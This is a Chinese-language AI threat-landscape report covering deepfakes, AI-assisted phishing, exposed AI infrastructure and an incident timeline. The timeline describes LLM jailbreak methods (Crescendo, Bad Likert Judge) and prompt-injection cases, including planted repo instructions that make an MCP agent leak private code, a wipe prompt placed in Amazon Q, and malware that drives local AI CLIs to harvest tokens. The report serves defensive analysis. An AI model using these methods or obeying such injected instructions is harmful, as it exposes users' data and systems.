智能之刃：近一年AI安全威胁演变与攻防新格局

第一章

概述

过去一年，人工智能相关的安全风险呈现出显著的结构性变化：攻击重心已从早期对“模型自身安全性”的关注，迅速扩展至围绕AI构建的完整技术生态，涵盖模型服务接口、智能体框架、插件与扩展机制、开发工具链、运行基础设施以及与现实系统连接的控制接口。从近一年公开的多起安全事件与研究成果来看，攻击者已不再将AI视为单一的软件组件或被动目标，而是逐渐将其纳入攻击体系，作为一个具备感知、决策与执行能力的复合攻击平台进行利用。

在此背景下，AI驱动攻击呈现出若干值得关注的技术特征。首先，攻击行为的自动化与规模化能力明显增强。借助大模型在文本生成、逻辑推理和任务编排方面的能力，攻击者能够以更低成本实施钓鱼诱骗、漏洞探测、脚本生成与攻击流程编排，从而缩短从攻击意图到实际执行之间的技术链路。其次，社会工程攻击的精准度与隐蔽性持续提升，攻击内容不再局限于模板化诱导，而是能够结合上下文信息与目标特征进行动态生成，这使得传统基于规则或特征的防御手段面临挑战。同时，随着AI智能体、插件系统及“人在环中”协作机制被广泛引入生产与研发环境，攻击面也从传统IT系统进一步延伸至模型推理流程、上下文管理机制与权限边界设计本身。

从已披露的安全事件来看，此类风险已不仅限于理论层面。模型越狱、提示注入、RAG与插件机制缺陷，使得攻击者无需突破底层系统即可影响模型输出、访问敏感数据或间接操控外部工具；而具备跨系统操作能力的智能体、集成开发环境扩展与自动化平台，在默认配置或不当部署条件下频繁暴露于公网，进一步扩大了攻击影响范围。部分典型案例显示，一旦此类系统遭到滥用，其影响已不再局限于信息泄露或内容违规，还可能扩展至对主机资源、云环境、第三方服务乃至实体设备的控制层面。比如在基础设施与硬件层面，我们观察到显存物理级攻击、AI集群被大规模接管、框架默认配置导致公网暴露等问题，说明算力资源与运行环境本身已成为直接攻击目标；在模型与数据层面，越狱测试、模型提取、参数高效微调滥用以及大规模对话和凭证泄露，反复暴露出当前模型在隔离性、完整性和可控性方面的先天不足；而在软件与工具链层面，围绕Agent框架、开发工具、依赖组件和云端插件的供应链攻击密集出现，尤其是2026年2月份针对火爆全网的AI智能代理OpenClaw核心Skills分发渠道“ClawHub”的大规模恶意skills植入攻击事件，攻击者开始有意识地利用AI工具“权限集中、自动化程度高、边界模糊”的特性，将单点失陷放大为系统性风险。

总体而言，过去一年的AI安全态势清晰地表明：AI正从被攻击的对象，转变为攻击链条中的关键组成部分与能力放大器。这一转变并未带来科幻式的威胁想象，而是通过真实、可复现、可规模化的技术路径，重塑了现有的网络攻击与防御格局。基于以上观察，本报告将从全球威胁态势、行业影响、AI驱动的具体攻击方式和AI模型原生威胁、典型安全事件与案例入手，系统分析近一年AI攻击的主要形态、技术特征及其安全影响，并在此基础上探讨相应的安全启示与防御方向，为构建新一代防御体系提供参考。

第二章

AI相关网络威胁研究现状

当前，生成式人工智能（GenAI）的广泛应用正加速重塑网络攻防格局。其作为“能力倍增器”的特性显著降低了网络犯罪门槛，促使攻击手段呈现出自动化、精准化与规模化的新特征。在此背景下，启明星辰ADLab对全球威胁情报、暗网市场动态及行业风险报告进行了深度搜集与关联分析。统计显示，72%的受访组织感知到网络风险的攀升，其中47%明确将GenAI带来的对抗性进步列为核心威胁来源；同时，暗网中深度伪造工具交易量同比激增223%，这表明恶意行为者不仅在革新勒索软件、网络钓鱼等传统手法，更衍生出针对AI基础设施的特有威胁。基于上述数据梳理，本章将全景式呈现全球AI网络威胁概览，深入剖析受影响行业，重点阐述从深度伪造、自适应恶意软件到模型滥用等威胁的实战化表现，并通过真实的AI安全事件复盘，为理解当下的高风险态势提供实证依据。

2.1 全球AI网络威胁概览

依据IBM X-Force、Varonis及FBI IC3等多家权威机构的联合研判，2025年全球网络威胁态势呈现出显著的“AI驱动型”增长特征。统计数据显示，AI辅助型攻击活动在近一年内同比增长约72%，标志着生成式工具已从实验性尝试转变为攻击流程中的常态化组件。更为严峻的是，在已披露的数据泄露事件中，约16%明确涉及攻击者对AI工具的使用，此类事件的平均经济损失攀升至572万美元，均值显著高于传统攻击。这表明AI不仅提升了攻击发生的频率，更在实质上加剧了破坏后果的严重性，使其正式进入主流威胁监测的核心视野。

2025年全球AI网络威胁趋势

在具体攻击向量上，生成式AI带来的“不对称优势”主要体现为网络钓鱼与社会工程学的爆发式增长。多项监测指出，得益于LLM在自然语言生成与情境构建上的成熟度，钓鱼邮件的语言伪装性已达到母语级水平，导致其打开率与点击率远超传统模板，部分统计甚至显示相关钓鱼活动规模增幅超过1,000%（如下图所示）。与此同时，攻击重心正向“身份层”快速迁移：信息窃取型恶意软件（Infostealer）投递量同比增长84%，约30%的入侵事件直接涉及有效凭证的滥用。这一数据关联反映出攻击者正利用AI辅助获取的身份信息，绕过高成本的技术突破环节，转而采用更隐蔽的“合法凭证入侵”策略。

值得注意的是，深度伪造（Deepfake）与AI语音合成欺诈虽然在整体威胁总量中占比尚小，却录得了超过2,000%的异常增长率。这种极高的增速表明，在高信任交互、远程身份验证及高管指令伪造等特定高价值场景中，基于生物特征的欺诈正在成为新的突破口。

2025年AI驱动网络攻击

总体而言，上述高增长指标共同勾勒出一个加速演进的威胁格局——攻击者正利用AI实现速度、规模与覆盖范围的全面扩展，这对全球威胁情报预警与防御资源的动态配置构成了紧迫挑战。

2.2 受影响行业

综合行业统计数据，AI相关网络威胁的影响程度与各行业的数据价值、技术架构复杂度及监管环境呈强相关性（如下图所示）。制造业在2025年的统计中首当其冲，以约26%的占比成为受攻击最多的行业。研判认为，这一高风险态势源于该行业高价值知识产权（IP）、遗留系统与运营技术（OT）环境的长期并存，以及高度复杂的供应链结构。在AI辅助攻击的背景下，针对工业控制环境的定向勒索软件、社会工程渗透以及间接供应链攻击呈现出持续活跃且高破坏性的特征。

金融保险与医疗卫生行业紧随其后，分别占据攻击事件总量的约23%。金融行业的威胁形态高度集中于凭证滥用与复杂欺诈，AI技术被广泛用于提升钓鱼内容的可信度及实施规模化账户接管。相比之下，医疗行业则面临更为严峻的勒索与数据泄露压力，其极高的平均单次事件成本与较长的检测周期，主要归因于敏感健康数据（PHI）的高黑市价值、严格的合规惩罚机制以及关键业务对连续性的极低容忍度。

在政府、能源及公用事业等关键基础设施领域，威胁情报显示攻击活动呈现出明显的“隐蔽化”与“长期化”趋势。攻击者更倾向于利用合法凭证维持持续访问权限（Persistence），而非追求即时的破坏效果，云环境配置错误与新兴AI组件的暴露往往成为其主要切入点。而在专业服务、零售与教育等行业，尽管总体事件占比相对较低，但因其在供应链生态中扮演着数据流转与支付节点的关键角色，正逐步成为攻击者实施横向扩散（Lateral Movement）的首选跳板。总体而言，高数据价值与高业务连续性要求的行业，在AI驱动的威胁浪潮中正面临着更为显著的风险暴露。

AI相关网络威胁受影响行业

2.3 AI赋能攻击与模型原生威胁

2.3.1 深度伪造攻击

生成式AI技术（GenAI）的普及显著降低了高质量伪造内容的技术门槛与成本，使其从少数高技术攻击者的专属工具，转化为具备广泛可获得性的社会工程化武器。基于Resemble AI发布的威胁情报与全球事件数据库，我们观察到这一技术的滥用正推动攻击边界迅速外扩：深度伪造攻击已不再局限于特定的高价值目标，而是呈现出向多样化人群快速渗透的趋势，受害群体正经历显著的结构性泛化（如下图所示）。

深度伪造攻击的目标群体

统计分析显示，2025年深度伪造技术已呈现高度复杂化特征（如下图所示）。视频形式凭借其强烈的情感冲击力，以46%的占比占据主导地位，其次是图像（32%）和音频（22%）。进一步的技术归因分析表明，攻击效率与质量均实现了关键突破：语音克隆仅需3–5秒样本即可生成相似度约85%的逼真语音，而高度精细化的人脸操纵技术已使得68%的伪造内容肉眼难辨；此外，33%的案例采用了音视频同步生成的跨模态整合手段，并伴随出现了能主动绕过现有防护机制的复杂检测规避技术，标志着防御难度的全面升级。

深度伪造媒介的分布

基于对攻击场景的关联分析，深度伪造已从单一的技术演示转化为多维度的实战攻击。常见手法包括模拟高管指令进行高额转账、冒充亲友制造紧急情境勒索，以及在远程招聘中绕过身份核验。这些活动的共同特征在于，攻击者并非利用系统漏洞，而是通过高度拟真的“身份呈现”击穿人工防线。其中，涉及到的一些重大深度伪造事件实例如下图所示。

深度伪造的重大事件

针对个体识别能力的防御评估揭示了严峻的认知短板。英美受访者测试数据显示，即便在预警状态下，仅有0.1%的参与者能完全正确区分真实与合成内容。其中，动态视频的识别准确率比静态图像低36%。这意味着，基于视听感官的传统信任体系在视频会议和远程验证场景中已近乎失效，其风险特征需在后续威胁评估中被重点关注。

2.3.2 AI增强型网络钓鱼

根据2025年Verizon《数据泄露调查报告》（DBIR）统计，网络钓鱼依然是数据泄露事件中最主要、最稳定的初始访问向量。与以往不同的是，生成式AI（GenAI）的深度融合彻底改变了这一传统攻击形态的成本结构与致死率。攻击者不再依赖粗放的“撒网式”投递，而是利用AI实现高度定制化的“鱼叉式”攻击规模化（如下图所示）。

AI辅助型恶意邮件占比趋势

Gartner在最新的电子邮件安全研究中指出，LLM（大语言模型）的应用将攻击者的整体成本降低了95%以上。通过对比（如下表所示），我们可以清晰地看到AI介入后攻击特征的根本性转变：传统的语法错误和低可信度特征已消失，取而代之的是母语级的语言流畅度和极低的边际成本。

对比维度	人工攻击特征	AI生成攻击特征
速度与规模（每小时）	1-2封/小时，针对10-50名目标	100+封/小时，可同时覆盖万级目标且保持个性化
语言质量	受攻击者能力限制，易有语法错误	50+种语言流畅互译，消除“非母语”特征
适应能力（被发现）	需数天至数周调整策略	数小时内即可根据反馈完成策略迭代
成本	约400~1500元/小时（人工）	几乎为零的边际成本
效果趋势	相对稳定	2023~2025年攻击成功率提升约55%

IBM的量化研究佐证了这一趋势：生成一封具有高度说服力的钓鱼邮件所需时间，已从人工平均1小时缩短至约5分钟。在涉及AI技术的安全事件中，AI生成钓鱼邮件（37%）与深度伪造冒充（35%）已成为绝对的主流形态。

与AI相关的安全事件主流占比量

当前的威胁态势正呈现出爆发式扩张特征。监测数据显示（如下图所示），仅在短短6个月内，钓鱼消息总量增长了202%，其中凭证窃取类攻击更是激增703%。与此同时，攻击路径正发生显著迁移，从单一的电子邮件渠道向企业协作平台（如Slack、Teams）、短信及社交媒体快速渗透；ShinyHunters与Scattered Spider等团伙的活跃案例证实，多渠道攻击已成为常态。在防御层面，据VARONIS研究指出，得益于AI的自动化变异能力，约80%的恶意链接被判定为此前未知的零日威胁。

这一数据表明，基于特征匹配的传统防御手段有效性正急剧下降，企业所面临的风险已不再局限于邮件网关，而是演变为一场全方位的消息安全危机。

网络钓鱼监测数据

2.3.3 恶意软件自适应与自动化侦察

2024至2025年间，威胁行为者持续深化生成式人工智能（GenAI）在其网络行动中的整合，核心趋势体现为以GenAI增强而非替代既有战术、技术和程序（TTPs）。这一演进在侦察与恶意软件开发环节尤为显著，并因行为体资源禀赋差异呈现出明显的分层化应用特征。国家级对手与资源有限群体均依托GenAI实现了能力的协同跃升，但在侧重点与技术路径上各有所长（如下图所示）。

在侦察阶段，不同层级的攻击者表现出截然不同的利用模式。国家级对手（如被归因于伊朗、朝鲜的相关行为体）广泛利用公开GenAI模型优化侦察链条，高效生成高度定制化的钓鱼内容、多语言社会工程素材及针对性载荷，同步辅助漏洞分析与目标画像构建，显著提升情报搜集效率与行动隐蔽性。相比之下，网络犯罪分子、黑客活动家等资源有限群体则借助GenAI降低技术门槛，通过自然语言指令快速生成信息搜集脚本、自动化扫描工具及基础攻击模块，实现侦察流程的轻量化与规模化执行，有效弥补了专业能力短板。

在恶意软件开发领域，GenAI正驱动攻击代码向环境感知与动态适应方向演进。威胁行为者利用其生成混淆逻辑、定制规避检测的载荷，并使恶意软件具备根据运行环境（如沙箱、主机配置）实时调整行为的能力。网络犯罪团伙借此加速勒索软件变种迭代与定向载荷生成；而国家级行为体则融合GenAI优化高级持续性威胁（APT）工具链，强化恶意软件的持久驻留能力、抗分析特性及C2基础设施的弹性伪装，显著提升攻击的隐蔽性与韧性。

GenAI对抗性使用的主要路径与影响

此外，随着组织将人工智能深度嵌入业务运营，模型接口、训练数据管道及推理服务端点等新攻击面的暴露，亦为威胁行为者提供了利用GenAI开展精准侦察与定制化载荷开发的新增长点。总体而言，GenAI的普及使不同层级的威胁行为体在侦察智能化与恶意软件自适应能力上实现协同跃升，这一趋势对防御体系构成复合型挑战，迫使组织在防御策略上向AI增强的动态行为分析、威胁狩猎及供应链安全管控转型。

2.3.4 AI基础设施渗透

在当前AI应用基础设施的快速部署中，核心组件的暴露面正呈现出系统性的扩张趋势，其中向量数据库与模型服务端的配置疏漏尤为显著（如下图所示）。研究团队监测发现，Chroma DB作为RAG架构中的关键开源组件，其暴露风险正在持续升级：2025年5月的扫描数据显示，在约240台被发现的服务器中，逾200台处于完全未受保护状态，攻击者可在无认证条件下随意读写甚至删除数据；与此同时，Redis作为兼具缓存与向量存储功能的组件，其互联网暴露节点已超过25万个，其中约2000个运行着具备内置向量能力的8.x版本，极大概率被用于存储敏感的嵌入数据。此外，AI模型服务器Ollama的公网暴露规模亦呈爆发式增长，其无认证实例数已从2024年底的3000余台激增至当前的10000余台。这些暴露的端点不仅直接导致数据泄露，更可能结合类似Pwn2Own大赛中披露的漏洞，成为攻击者进一步触及服务器底层资源的跳板。

AI基础设施暴露面扩张

在AI代理（Agent）互联层面，模型上下文协议（MCP）的广泛采用带来了更为复杂的安全挑战。自2025年3月OpenAI标准化该协议以来，MCP虽迅速成为AI助手连接外部生态的通用接口，但其部署现状却充斥着严重的认证缺失与配置缺陷。为了直观展示这一新兴威胁面的严重程度，我们汇总了Knostic、Astrix Security等多家机构的监测数据（如下图所示）。分析指出，互联网上已存在大量直接暴露的MCP服务器：超过1800台实例允许在无认证情况下访问内部工具列表，而在5000余个开源实现中，半数以上依赖几乎不轮换的静态凭证或完全缺乏认证机制。更令人担忧的是，HiveTrail的研究揭示了近一半的开源MCP服务器存在命令注入漏洞，且普遍允许不受限制的URL请求，这实际上构建了一条通往云元数据服务或内部网络的SSRF攻击快车道。

全球MCP服务器风险图谱

高危漏洞的频发进一步证实了上述风险已具备现实的可利用性。CVE-2025-32711（EchoLeak）的披露证明，即便在防护相对成熟的Microsoft 365 Copilot环境中，AI命令注入仍可导致零点击数据泄露；而CVE-2025-6514则展示了攻击者如何利用恶意的MCP服务器实现远程代码执行。此外，“NeighborJacking”等新型攻击手法揭示，大量MCP服务器因被错误绑定至所有网络接口，在扁平化企业网络中显著放大了横向移动的风险。这些事实表明，针对AI基础设施的渗透威胁并非孤立的软件缺陷，而是由于快速集成与安全滞后所导致的系统性安全危机，迫使组织必须从架构层面重新审视AI组件的访问控制与网络隔离策略。

2.3.5 提示注入和模型滥用

当前，网络犯罪地下生态正加速构建以“武器化AI”为核心的高级攻击体系，通过“网络犯罪即服务（CaaS）”模式向攻击者提供工业级的破坏能力。以WormGPT、FraudGPT为代表的黑帽工具，系基于GPT-J等开源模型并在恶意软件、钓鱼数据上进行微调（Fine-tuning）而成，专门用于生成无语法错误的多语言钓鱼邮件、多态恶意代码以及商业邮件泄露（BEC）素材。与此同时，DarkBERT等原本用于合法暗网研究的模型在被越狱或重新包装后，亦被滥用于降低漏洞开发门槛。此类工具不仅具备极强的语境保持与检测规避能力，近期更出现了构建在Grok、Mixtral等主流商用大模型之上的变体，攻击者仅需支付低廉的订阅费用，即可通过越狱手段绕过安全限制，获取高质量的攻击辅助。

AI武器化驱动的高级攻击体系

在模型滥用之外，提示注入（Prompt Injection）已演变为生成式AI应用面临的首要安全威胁。根据商业与技术洞察公司Gartner, Inc.的一项调查，29%的网络安全负责人表示，其所在组织在过去12个月中曾遭遇针对企业级生成式AI（GenAI）应用基础设施的攻击。另有32%表示经历过针对AI应用的攻击，其中攻击者利用了应用提示（如下图所示）。聊天机器人助手尤其容易受到多种对抗性提示技术的影响，例如攻击者通过精心构造的提示，诱导大语言模型（LLM）或多模态模型生成带有偏见或恶意的输出。

GenAI对攻击形势的影响

总体而言，提示注入与模型滥用的深度结合，正在推动攻击模式从“人工主导、逐步推进”向“高度自动化集群”发生质的跃迁。对抗性AI的引入打破了传统攻击在侦察与执行阶段的人力瓶颈，研究表明，攻击者现已能调度多个AI代理（Agents）协同运行，自主完成80%–90%的战术操作，实现了攻击能力的指数级提升。随着LLM与第三方应用集成的日益紧密，由提示注入引发的数据泄露、业务流程操纵及横向移动风险将持续上升，迫使组织必须将提示注入视为新一代核心安全问题，在架构设计与权限管理层面建立系统性的防御纵深。

2.4 攻击事件回顾与分析

在前文的分析中，我们分别从全球网络威胁态势、受影响行业与区域分布，以及传统攻击手段向AI技术演进的路径等角度，对2025年AI驱动攻击的整体变化进行了拆解。这一过程中，我们逐步意识到，AI已不再只是被动嵌入攻击流程的辅助工具，而是在情报收集、内容生成、决策支持乃至自动执行等多个环节中发挥着实质性作用。攻击的自动化程度、定向性和持续性因此被显著放大，攻击面也随之从表层的内容与交互问题，延伸至模型本身、运行框架以及支撑其运作的底层基础设施。不过，仅停留在技术趋势与攻击方法层面，并不足以判断这些变化在真实环境中的可落地程度和风险边界，这也是我们进一步回到具体安全事件本身的直接原因。

在过去一年中，我们对公开披露的AI相关安全事件进行了持续收集、交叉验证与时间线整理，去噪声并提炼共性后，得到部分典型AI安全事件，如下图所示：这些事件呈现出明显的多层次与系统性特征：风险不再集中于“模型是否生成不当内容”，而是沿着“基础设施—软件系统—人机交互—现实世界接口”多个方向同时展开。

部分典型AI安全事件

2.4.1 AI安全事件回顾

如前所述，随着大模型与AI基础设施被大规模引入生产环境，其安全风险已不再局限于传统的模型越狱或内容滥用，而是迅速扩展到AI基础设施、硬件安全、模型安全、数据泄漏、供应链、Agent权限以及AI武器化等层次领域。本章节我们将以时间线为主线，对过去一年在上述各领域具有代表性的多起大模型与AI生态安全事件进行系统回顾与分析，并梳理这些事件的关键节点、深入分析其产生的原因及其对用户和社会的广泛影响，以揭示当前AI安全风险从“模型层问题”向“系统性风险”演化的整体趋势。

2025年1月，DeepSeek接连遭遇多轮分布式拒绝服务（DDoS）攻击。攻击目标集中在其对外提供的API服务及聊天交互系统，手段包括NTP反射、Memcached放大等典型流量型攻击方式。持续的高强度流量冲击一度引发平台服务异常，导致新用户注册功能受限（如下图），尽管已注册用户仍可正常登录使用。该系列攻击对DeepSeek的稳定运行造成了显著影响，对整体用户体验及业务连续性带来了较大冲击。

由于DDOS攻击，新用户注册遇阻

同在2025年1月，安全公司Wiz指出DeepSeek所使用的ClickHouse数据库存在严重配置缺陷，导致其中存储的敏感数据可被未经授权的第三方直接访问。受影响的暴露地址包括oauth2callback.deepseek.com:9000和dev.deepseek.com:9000。

Wiz的验证结果显示，该数据库中保存了超过百万条日志数据，内容涵盖用户对话记录、API密钥、后端架构信息以及其他高敏感资产。由于该实例对公网开放，且未启用加密与身份认证机制，攻击者不仅能够完全读取甚至篡改数据库内容，还可能以此为跳板在DeepSeek运行环境中实施权限提升。下图展示了部分被泄露的敏感数据样本。

泄漏的部分敏感信息截图

同在2025年1月，来自Qyallys、Cisco以及Unit42等机构的安全研究人员对DeepSeek模型开展了系统性的越狱攻击评估。测试涵盖多种已知绕过手法，包括Evil Jailbreak（通过设定“邪恶同伴”式角色诱导）、Crescendo（逐步递进提示，将对话引向受限主题）、Deceptive Delight（将高风险内容伪装进看似正常的讨论中以规避检测），以及Bad Likert Judge（利用李克特量表操纵模型输出有害结论）等。

Cisco公布的多模型对比测试结果（见下图）显示，在上述攻击场景下，DeepSeek R1的越狱成功率达到100%。相关结论表明，该模型在安全防护与内容约束方面存在明显不足，极易被滥用于生成恶意或违规内容。

Cisco提供的对多个模型攻击成功率

2025年2月9日，地下黑客论坛BreachForums上出现了一则由攻击者“Gloomer”发布的披露帖（见下图）。该攻击者声称已成功攻破AI聚合平台OmniGPT的系统。OmniGPT作为一款集成多家主流厂商API的AI服务平台，支持接入ChatGPT-4、Claude 3.5、Perplexity及Google Gemini等模型，并向用户提供团队协作、数据管理和图像分析等功能。据披露内容显示，此次安全事件导致大量敏感数据外泄，涉及用户日常交流内容、云盘共享链接、账户与账单信息、API密钥以及学历相关文件等隐私数据。其中受影响用户约3万人，其电子邮件地址和电话号码被泄露，同时还有多达3400万条用户对话记录遭到曝光。

黑客发布的帖子

2025年3月14日，安全研究人员发现开源项目agentkit所使用的工作流组件“tj-actions/changed-files”遭到攻击者篡改，恶意代码被植入其中（见下图），导致运行该工作流的GitHub仓库中存放的敏感机密信息被窃取。该安全事件随后被编号为CVE-2025-30066。

恩多实验室（Endor Labs）的分析指出，此次典型的供应链攻击波及范围广泛，预计至少有218个GitHub仓库受到影响。泄露的数据主要包括大量高价值凭证，例如用于DockerHub、npm以及亚马逊云服务（AWS）的访问密钥，同时还涉及GitHub安装级访问令牌，给相关项目和企业带来了重大的安全风险。

植入的恶意代码

2025年4月，来自美国德克萨斯大学圣安东尼奥分校、俄克拉荷马大学以及弗吉尼亚理工大学的研究团队共同披露了一类新的大模型安全风险，被称为“代码包幻觉”。该问题表现为大型语言模型在自动生成代码时，可能会调用现实中并不存在的软件依赖包。攻击者一旦抢先创建同名的恶意包，便可借机对模型生成的代码进行投毒。研究人员对包括ChatGPT、CodeLlama、DeepSeek在内的16种主流LLM进行了评估，发现商用模型生成虚构依赖包的比例平均不低于5.2%，而开源模型这一比例则高达21.7%以上。通过引入检索增强生成和监督式微调等技术手段，研究团队将“幻觉包”的出现频率成功压降了约85%。目前，代码生成过程中出现的这类“幻觉”问题及其对软件安全带来的潜在影响，整体仍停留在探索和起步研究阶段。

2025年5月26日，安全研究人员披露了一种新型攻击方式，目标直指使用GitHub官方MCP服务器的AI代理程序（见下图）。攻击者将恶意指令巧妙伪装并嵌入到公共仓库的正常内容中，诱使AI Agent在自动执行任务时，违规读取并向公共仓库回传私有仓库中的敏感信息，从而实现对用户私有代码资产的间接访问。这意味着，当用户使用集成了GitHub MCP能力的Claude 4等AI助手时，若缺乏有效的安全防护，其个人或企业的私有代码与敏感数据存在被非授权泄露的现实风险。

针对使用GitHub官方MCP服务器的代理程序的新攻击手段

2025年6月，Aim Labs公布了一项被编号为CVE-2025-32711的“零点击提示注入”漏洞，影响Microsoft 365 Copilot。该漏洞使攻击者无需任何用户交互，即可诱导Copilot在后台泄露敏感信息。如图所示，攻击过程利用了大语言模型自身的执行逻辑，使其在当前运行环境中主动提取并外泄最核心的数据资产。整个攻击不依赖特定用户操作，可在单轮或多轮对话场景下稳定触发，体现出高度隐蔽性与自动化特征，显著放大了企业级AI助手面临的数据安全风险。

攻击演示图

2025年7月，“Amazon Q”的VS Code扩展被曝发生恶意提示注入攻击。攻击者植入的提示词中包含类似“系统级擦除”的危险指令（如下图所示），一旦被执行，可能直接清除本地文件，甚至借助AWS CLI进一步删除云端资源。“Amazon Q”插件用于将开发者的集成开发环境（IDE）接入由人工智能驱动的代码辅助服务，累计安装量已超过96万次。此次事件暴露出在将AI能力深度嵌入开发工具链时，潜藏着不容忽视的安全隐患。

插入的恶意提示词

同样在2025年7月，英伟达GPU被多伦多大学的研究人员指出存在严重漏洞，一种名为GPUHammer的攻击方式，能让其GPU上运行的大模型准确率从80%直接掉到不足1%（见下图）。该方法能够在不直接访问数据的情况下，对NVIDIA显卡上的GDDR6视频内存中的单个位进行修改。实验表明，哪怕只有一个位被损坏，也会使机器学习模型的准确率从80%降至不足1%。

GPUHammer这种攻击与之前已知的Rowhammer漏洞类似，属于与GPU相关的漏洞，它会影响存储单元，导致相邻位发生翻转，从而悄悄篡改数据。与传统漏洞不同的是，这种漏洞不需要访问模型或其数据，只需在相同的GPU环境中进行划分即可，例如在云服务中进行划分。该测试是在NVIDIA RTX A6000显卡上进行的，但Ampere, Ada, Hopper和Turing架构的模型也存在风险。这次漏洞不是软件Bug，而是“物理攻击”，GPUHammer是首个成功攻击GPU显存的Rowhammer攻击，它并不是通过代码篡改模型文件，而是直接对显存“物理动手”。以前Rowhammer只能攻击CPU用的内存，而现在，GPU也中招了。

攻击数据

2025年8月13日，路透社报道，美国政府在出口至中国的AI芯片及相关服务器设备中暗中部署了定位追踪装置，用于监控相关产品是否被转运至受限制的最终用途；消息人士透露，该措施早在2024年便已启动，重点对象包括戴尔、超微等厂商的整机服务器，而这些设备通常配备英伟达或AMD的高端GPU。拆机显示美方此次使用的追踪器形态隐蔽多样、具备独立供电与加密通信能力，可在服务器出厂或运输环节被植入并在上电即持续回传定位信息，使进口方即便通关后拆箱也难以规避被长期追踪。

2025年8月26日，广泛被数百万开发者使用的构建工具Nx遭遇入侵。攻击者获取了项目维护者的npm访问令牌后，迅速发布了多个被植入恶意代码的版本，整个攻击窗口持续了5个多小时，潜在影响范围可达成千上万名开发者。供应链投毒本身并不罕见，但此次事件的特殊之处在于，恶意代码并非单纯自行执行，而是主动调用受害者本地已安装的AI开发工具，让这些工具充当信息搜集和数据外传的“帮手”。攻击者直接驱使Claude Code、Gemini CLI、Amazon Q等AI助手对本机钱包、文件和令牌进行全面扫描，并将结果打包发送出去。在一波攻击中，攻击者利用被泄露的凭证将原本私有的组织存储库公开，下图是攻击者将受害者私有存储库重命名为“s1ngularity-repository-{随机字符串}”并将其设置为公开状态的截图。

攻击者将私有存储库重命名并将其设置为公开状态

这种通过依赖投毒“劫持”本地AI Agent、借助其高权限就地完成攻击闭环的手法尚属首次，也预示着在AI时代，具备强大操作能力的Agent工具正演变为更隐蔽、破坏性更强的新型攻击载体。

2025年9月，有研究人员指出虽然当前流行AI微调技术LoRA部署方便，但由于其参数量小（紧凑），反而更容易被黑客“通过查询”的方式将其特有的功能偷走。研究人员提出了一种针对LoRA适配模型的新型模型提取攻击方法StolenLoRA，该研究提出了针对LoRA微调模型的“LoRA抽取攻击”，并展示了StolenLoRA方法如何借助大模型生成查询数据，在有限访问条件下高效复现专有模型能力。实验结果显示，即使跨模型骨干架构，攻击仍能达到接近97%的成功率（见下图），暴露出PEFT架构下严重的模型窃取风险。

在10000次查询次数下，由不同模型提取攻击所得到的Acc（%）和ASR（%）

2025年10月，JFrog安全研究团队发现在oatpp-mcp中的MCP SSE端点会返回一个实例指针作为会话标识符，但该标识符既不唯一也不具备加密安全性。这使得能够访问oatpp-mcp服务器的网络攻击者能够猜测未来的会话标识符，并劫持合法客户端的MCP会话，从oatpp-mcp服务器返回恶意响应。

2025年11月初，以色列网络安全厂商Oligo公布的ShadowRay 2.0攻击事件显示，原本局限于AI集群算力挖矿劫持的威胁，已升级为影响全球多行业的结构性安全事件。代号为“IronErn440”的攻击组织从2024年3月的早期攻击逐步演进，最终在2025年引发了大范围的集中爆发。攻击者将Ray AI框架作为主要突破口，借助CVE-2023-48022漏洞（未鉴权Jobs API可触发远程代码执行），在数周时间内接管了约23万台暴露在公网中的AI服务器，构建了迄今规模最大的AI算力挖矿僵尸网络。

2025年12月，网络安全厂商Checkmarx发布报告披露了一种被称为“循环欺骗”（Lies-in-the-Loop，LITL）的新型攻击技术，该手法专门针对AI系统中“人在环中”（Human-in-the-Loop，HITL）设计的安全校验机制。如下图所示，攻击者通过构造精巧的提示词，伪装出看似可信的智能体审批界面，诱使用户在不知情的情况下同意执行恶意代码。这种攻击将原本用于风险控制和人工审核的防护机制反向利用，转化为入侵通道，表明AI系统的安全威胁形态正在发生质变。报告指出，LITL攻击的成功率可达63%，并已在OpenAI Assistant、Anthropic Claude等主流AI Agent工具中验证，一旦得手，可能直接引发服务器权限被篡改、敏感信息外泄等高风险后果。

LITL攻击流程

2026年1月，Palo Alto Networks团队unit42披露了一看似无害的网页利用客户端API调用可信的大型语言模型(LLM)服务，实时动态生成恶意JavaScript代码。攻击者可精心设计提示信息，绕过人工智能安全防护机制，诱使LLM返回恶意代码片段。这些代码片段通过LLM服务API返回，然后在受害者的浏览器中运行时进行组装和执行，最终生成功能齐全的钓鱼页面，如下图。

通过在浏览器中运行时动态生成的JavaScript来构建的钓鱼页面示例

同时，该团队于2026年1月还在苹果（Apple）、Salesforce和英伟达（NVIDIA）发布在GitHub上的三款开源人工智能/机器学习（AI/ML）Python库中发现了安全漏洞。这些库的受影响版本在加载包含恶意元数据的模型文件时，可能导致远程代码执行（RCE）。相关漏洞编号为CVE-2025-23304和CVE-2026-22584。

2026年1月26日，Check Point研究人员发现了首款几乎完全由人工智能构建的高级恶意软件框架VoidLink，VoidLink的出现标志着网络安全进入了一个由人工智能驱动攻击的全新时代。作为首个有完整记录、几乎完全由AI开发的高级恶意软件框架，它从根本上改变了网络攻击的开发和部署方式。其核心在于，单个攻击者借助名为TRAE SOLO的AI模型，采用“规范驱动开发”模式，仅在一周内就生成了包含超过8.8万行复杂代码、集成了eBPF和LKM rootkits等高级隐身技术并专门针对云环境与容器平台的攻击框架。这一传统上需要一个经验丰富的程序员团队才能完成的复杂工程，如今实现了效率与能力的颠覆性飞跃，使得高级网络犯罪的准入门槛被急剧拉低。最终，该框架是因开发者自身的操作安全失误，暴露了从技术蓝图到源码的完整开发记录才被研究人员发现，其项目概述如下图所示。

“VoidLink”项目概述（来源Check Point）

VoidLink的出现证实了AI正在迅速成为高级网络攻击的核心生产工具。这也进一步加深了安全界对于“有多少未被发现的AI恶意软件已悄然存在”的普遍忧虑。AI不仅改变了攻击者的能力，也迫使防御策略必须进行根本性的调整，以应对即将到来的、由AI驱动的攻击浪潮。

2026年1月，AI助手工具Clawdbot（后更名为OpenClaw）在社交平台上迅速走红，其是一款自主运行的智能代理程序，它运行在用户的个人电脑上，并能代表用户执行实际操作：如命令行操作、文件操作、网络请求等。许多用户选择将其部署在Mac mini等本地硬件上运行。但不少用户并未同步配置必要的安全防护措施，导致大量Clawdbot实例暴露在公网。安全研究人员已确认，互联网上存在多个几乎没有任何防护的Clawdbot实例仍在运行，如下图所示。

暴雷于公网的Clawdbot节点

